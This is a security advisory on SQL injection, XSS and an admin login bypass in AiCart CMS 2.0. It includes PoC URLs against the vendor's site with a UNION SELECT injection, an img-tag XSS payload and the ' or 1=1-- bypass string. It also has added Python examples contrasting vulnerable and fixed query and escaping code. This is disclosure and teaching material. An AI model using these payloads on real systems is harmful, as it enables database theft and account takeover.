Document Title:
===============
AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities

Release Date:
=============
2011-06-21

Vulnerability Laboratory ID (VL-ID):
====================================
203

Product & Service Introduction:
===============================
AiCart shopping cart software is created in PHP and uses a simple template structure, which makes it very flexible and easy to modify. The data in AiCart is stored in a MySQL database. AiCart is fully W3C-compliant with a CSS-based layout. AiCart features a built-in Content Management System giving you the ability to easily manage and create unlimited web site pages with an easy-to-use online text editor. Best of all, AiCart is search engine friendly. A merchant can specify meta tags for all pages, and product and category pages are all stored using the relevant meta data, which results in higher search engine rankings. AiWood Digital also offers custom programming services. Every client can get a storefront with a unique look, fully customized to completely fit the style, image and structure of your business. AiCart is fully compatible with PayPal and also features its own store merchant (credit card processing requires an SSL certificate for maximum security) as well as having the option to process offline payments.

(Copy of the Vendor Homepage: http://www.aicart.ca/home)

Abstract Advisory Information:
==============================
The Vulnerability-Lab Team discovered multiple SQL Injection and Cross Site Scripting vulnerabilities, plus an authentication bypass, in AiCart CMS v2.0.

Vulnerability Disclosure Timeline:
==================================
2011-06-20: Public or Non-Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
AiCart CMS v2.0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
1.1
Multiple SQL Injection vulnerabilities have been detected in the new AiCart Shopping CMS v2.0.
The vulnerabilities allow a remote attacker (pre-auth) to inject their own SQL statements into the application's DBMS. The logged queries below show the injection points: request values are concatenated directly into the statement text, both as quoted string values (the basket INSERT, the product_brands lookup) and as unquoted identifiers and numbers (the ORDER BY and LIMIT clauses of the pager query). The resulting MySQL errors are returned to the client verbatim, including the absolute path of the database class, which also makes the injection points trivial to confirm.

Vulnerable Module(s):
[+] Add to Cart (Shop)
[+] Sortby
[+] TYPE_ID
[+] ID

--- SQL Error Logs ---
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Limit 24, 24 at line 4
SQL Data: SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY -1 Limit 24, 24
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near order by 1--, NOW()) at line 1
SQL Data: INSERT into basket (cartid, uid, pid, quantity, date) values (5669fc809f48dff557fb50bee3ab472d-1308462112, 2, 2, order by 1--, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
SQL Data: SELECT * from product_brands WHERE lname = -1;
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50

SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near , NOW()) at line 1
SQL Data: INSERT into basket (cartid, pid, quantity, date) values (38314720c60f05f218b581bad46caed0-1308461139, 2, -1, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43

1.2
A persistent input validation vulnerability has been detected in the ajax module, in the pager parameter request. The vulnerability allows a remote attacker to implement malicious persistent script code on the application side. Successful exploitation of the bug allows an attacker to hijack admin/customer sessions (accounts) or can lead to context request manipulation.
Vulnerable Module(s):
[+] Ajax - Pager
[+] Credit Name
[+] Rating
[+] Search

1.3
An Auth Bypass vulnerability has been detected in the admin login form of the AiCart Admin Interface. The bug allows an attacker to bypass authentication to the admin panel. The verbose SQL error that the application returns to the client (reproduced in the PoC URL below) shows that the login query is built by string concatenation: the injected quote closes the email literal, `or 1=1` makes the WHERE clause true for every row, and `--` comments out the `AND password = ...` comparison, so the submitted password is never checked.

Pictures:
../1.png
../1.jpg
../2.jpg
../3.jpg
../4.jpg
../5.jpg
../6.jpg

Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...

1.1 SQL Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=1&sortby=-1%27&where_id=&type_id=Nikon
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=0&sortby=&where_id=&type_id=-1%27
http://www.aicart.ca/store?action=orders&id=-3+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

1.2 XSS Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=reviews&page=0&sortby=&where_id=pid%20=%202&pager_id=
http://www.aicart.ca/search?searchstring=%22%3E%3Cimg%20src=%22http://gallery.7bna.com/data/media/50/injection.jpg%22%3E&x=0&y=0

1.3 Auth Bypass:
http://www.aicart.ca/v3/admin/SQL%20Error:%20You%20have%20an%20error%20in%20your%20SQL%20syntax;%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20'8ce3f2de6a1e527b7e2b0c81807743e9''%20at%20line%201%3Cbr%20/%3ESQL%20Data:%20SELECT%20*%20from%20users_admin%20where%20email%20=%20''%20or%201=1--'%20AND%20password%20=%20'8ce3f2de6a1e527b7e2b0c81807743e9'%3Cbr%20/%3EFile:%20/home/aicart/public_html/v3/includes/class.sql_db.php%3Cbr%20/%3ELine:%20500/admin

Decoded SQL Data from the reflected error:
SELECT * from users_admin where email = '' or 1=1--' AND password = '8ce3f2de6a1e527b7e2b0c81807743e9'

String: 'or 1=1--

Security Risk:
==============
1.1 The security risk of the multiple SQL injection vulnerabilities is estimated as critical.
1.2 The security risk of the multiple cross site scripting vulnerabilities is estimated as medium.
1.3 The security risk of the auth bypass vulnerability is estimated as critical.
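The following is an added example and not code from the advisory or from AiCart. It rebuilds the two query shapes quoted in the SQL error logs (the pager `sortby`/`page` query from 1.1 and the admin login query from 1.3) against an in-memory SQLite database, runs the advisory's `' or 1=1--` and `sortby=-1'` inputs through them, and places a hardened version beside each. The table layout, the sample rows, the digest function and every function name are assumptions made for this demonstration; SQLite is used in place of MySQL only so the example runs offline.

```python
"""Added example (not AiCart code): vulnerable vs. hardened versions of the
login and pager queries shown in the advisory's error logs."""
import hashlib
import sqlite3


def digest(password):
    # Assumption: the advisory only shows a 32-hex digest in the logged query and
    # does not say how it is produced. sha256 is used here purely so that the
    # vulnerable and fixed paths compare the same value; it is not a recommendation
    # for password storage.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed sample data: one admin account and three products."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users_admin (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, bid INTEGER, status INTEGER,
                               name TEXT, price REAL);
        INSERT INTO products VALUES (1, 2, 1, 'D3100', 499.0),
                                    (2, 2, 1, 'D7000', 1199.0),
                                    (3, 2, 0, 'D90', 899.0);
    """)
    db.execute("INSERT INTO users_admin VALUES (1, 'admin@example.test', ?)",
               (digest("correct horse battery staple"),))
    return db


# --- 1.3: admin login --------------------------------------------------------

def login_vulnerable(db, email, password):
    # Built by string concatenation, the shape shown in the reflected error:
    # the email value is spliced straight into the SQL grammar.
    sql = ("SELECT * from users_admin where email = '" + email
           + "' AND password = '" + digest(password) + "'")
    return db.execute(sql).fetchone()


def login_fixed(db, email, password):
    # Bound parameters: values travel separately from the statement text, so
    # quotes and `--` inside the email stay literal data.
    sql = "SELECT * FROM users_admin WHERE email = ? AND password = ?"
    return db.execute(sql, (email, digest(password))).fetchone()


# --- 1.1: pager sortby / page ------------------------------------------------

PER_PAGE = 24


def pager_vulnerable(db, sortby, page):
    # ORDER BY and LIMIT taken straight from the request, as in the logged
    # "ORDER BY -1 Limit 24, 24" query.
    sql = ("SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY "
           + str(sortby) + " Limit " + str(page * PER_PAGE) + ", " + str(PER_PAGE))
    return db.execute(sql).fetchall()


SORT_COLUMNS = {"name": "name", "price": "price", "id": "id"}  # allow-list


def pager_fixed(db, sortby, page):
    # Identifiers cannot be bound as parameters, so the ORDER BY column is looked
    # up in a fixed allow-list (unknown values fall back to id); page is coerced
    # to a non-negative int and the LIMIT/OFFSET values are bound.
    column = SORT_COLUMNS.get(sortby, "id")
    try:
        page = max(0, int(page))
    except (TypeError, ValueError):
        page = 0
    sql = (f"SELECT * FROM products WHERE bid = ? AND status = 1 "
           f"ORDER BY {column} LIMIT ? OFFSET ?")
    return db.execute(sql, (2, PER_PAGE, page * PER_PAGE)).fetchall()


def sortby_breaks_query(db, sortby):
    """True if the vulnerable pager raises a SQL syntax error for `sortby`,
    i.e. the value reached the SQL parser as grammar rather than as data."""
    try:
        pager_vulnerable(db, sortby, 1)
    except sqlite3.OperationalError:
        return True
    return False


def run_demo():
    db = make_db()
    bypass = "' or 1=1--"  # the advisory's auth-bypass string
    return {
        "vulnerable_login_bypassed": login_vulnerable(db, bypass, "wrong") is not None,
        "fixed_login_bypassed": login_fixed(db, bypass, "wrong") is not None,
        "fixed_login_valid": login_fixed(db, "admin@example.test",
                                         "correct horse battery staple") is not None,
        "vulnerable_pager_error": sortby_breaks_query(db, "-1'"),  # PoC: sortby=-1%27
        "fixed_pager_rows": len(pager_fixed(db, "-1'", "1'")),   # falls back to id, page 0
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The login fix is the parameter binding, not the digest: with bound parameters the bypass string is compared as a literal email and matches nothing. For the pager, binding alone is not enough because a column name is an identifier, which is why the allow-list is needed; the same treatment applies to the `type_id` and `id` parameters listed above, which are either numeric (cast to int) or looked up against a fixed set.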
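The following is an added example and not code from the advisory or from AiCart. It takes the payload from the 1.2 search PoC URL (decoded from `searchstring`) and shows why it becomes a live `<img>` element when the search string is echoed into the page unescaped, and that escaping at output time neutralises it. The page template is an assumption; the advisory only shows the request URL, not the markup the search page produces.

```python
"""Added example (not AiCart code): reflected search string rendered with and
without output encoding, checked with Python's HTML parser."""
import html
from html.parser import HTMLParser

# Payload from the advisory's XSS reference URL, URL-decoded.
POC_PAYLOAD = '"><img src="http://gallery.7bna.com/data/media/50/injection.jpg">'

# Assumed template: the search term is echoed both into an attribute and into
# the page body, the two contexts a reflected value usually lands in.
TEMPLATE = ('<form action="/search"><input type="text" name="searchstring" '
            'value="{value}"></form><p>Results for {value}</p>')


def render_vulnerable(searchstring):
    # Raw interpolation: the payload's leading quote closes the value attribute
    # and the rest of it is parsed as markup.
    return TEMPLATE.format(value=searchstring)


def render_fixed(searchstring):
    # html.escape with quote=True encodes <, >, &, " and ', so the value can
    # neither close the attribute nor open a tag in the body.
    return TEMPLATE.format(value=html.escape(searchstring, quote=True))


class TagCollector(HTMLParser):
    """Records the start tags a browser would create from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(markup, template_tags=("form", "input", "p")):
    """Return the tag names present in `markup` that the template itself does
    not emit; an empty list means the user value stayed text."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return [tag for tag in parser.tags if tag not in template_tags]


if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(POC_PAYLOAD)))
    print("fixed:     ", injected_tags(render_fixed(POC_PAYLOAD)))
```

The same output-time escaping covers the persistent cases listed above (credit name, rating): what is stored in the database is irrelevant as long as every value is encoded for the context it is written into when the pager renders it, and the parser check is a cheap way to confirm that a given template leaves no path for a user value to become a tag.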
Credits & Authors:
==================
Vulnerability Research Laboratory

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory